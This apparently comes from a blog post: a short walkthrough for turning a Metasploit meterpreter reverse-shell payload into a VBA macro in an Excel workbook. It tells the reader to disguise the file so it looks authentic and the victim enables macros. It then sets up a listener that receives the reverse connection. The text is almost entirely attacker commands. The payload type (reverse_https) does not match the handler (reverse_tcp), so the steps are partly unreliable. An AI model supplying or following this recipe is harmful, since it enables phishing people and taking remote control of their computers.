Open metasploit framework by typing the
command: and type
use windows/meterpreter/reverse_https
msf exploit (reverse_https)>set lhost 192.168.0.104 (IP
of Local Host)
msf exploit (reverse_https)>set lport 443
msf exploit (reverse_https)>generate –t vba
The command generates -t vba means to
generate a raw code in text formal in language visual basic.
Copy the code that comes in terminal.
Now open windows->New Microsoft Office Excel Worksheet->view (on the top bar) ->macro
Enter the macro name->create
Now select:
'This Workbook' and paste the vba code generated before and save the file as a
new name and edit the document so as to make it look authentic and user should
definitely enable the macros option.
Now we need to set up a
listener to handle reverse connection sent by victim when the exploit
successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.104
set lport 443
exploit
Now, wait for
the victim to open the document and enable the macros option. As soon as he
clicks on the enable macros option we will get a meterpreter session.
0 comments:
Post a Comment